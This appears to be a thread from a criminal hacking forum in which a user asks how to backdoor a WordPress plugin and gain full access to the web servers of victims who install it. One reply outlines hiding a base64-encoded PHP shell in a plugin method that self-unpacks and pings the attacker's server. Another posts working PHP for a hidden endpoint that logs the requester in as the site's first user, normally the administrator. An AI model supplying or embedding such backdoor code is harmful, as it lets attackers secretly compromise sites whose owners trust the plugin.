• XSS.stack #1 – первый литературный журнал от юзеров форума

Wordpress Plugin Backdoor [Help]

M4STERMIND

HDD-drive
Пользователь
Регистрация
21.12.2020
Сообщения
48
Реакции
4
Hey everyone,

I'm interesed to know if there's any ready-to-use backdoor that I can use to infect a wordpress plugin so I can get full access to the victim's web server (after the victim uploads and activates the plugin).

If there isn't any public backdoor, can you recommend any tips or techniques on how to infect a WP Plugin with a backdoor?

I appreciate if you could help me with any suggestions.

Thanks alot in advance.





Привет всем,

Меня интересует, существует ли какой-нибудь готовый бэкдор, который можно использовать для заражения плагина wordpress, чтобы получить полный доступ к веб-серверу жертвы (после того, как жертва загрузит и активирует плагин).

Если публичного бэкдора не существует, можете ли вы порекомендовать какие-либо советы или техники по заражению WP-плагина с помощью бэкдора?

Буду признателен, если вы поможете мне с любыми предложениями.
 
I think you can hide php code in one of the plugin methods, which will get php shell from the base64 string, and when it is executed, check if this php shell is already unpacked to a directory on the server, and if not, then unpack it. You can send some ping request to your server, which will mean that the shell is installed.
For example open source shell from Kali Linux tools https://www.kali.org/tools/b374k/
 
Последнее редактирование:
Add a hidden endpoint to the plugin. Below, I am sharing the code that automatically logs into the ADMIN PANEL (wp-admin).

PHP:
// sample
<?php
if ($_GET['secret'] == "login") {
include("../wp-load.php");
wp_set_auth_cookie(1,1);
}
?>

 
Последнее редактирование:


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх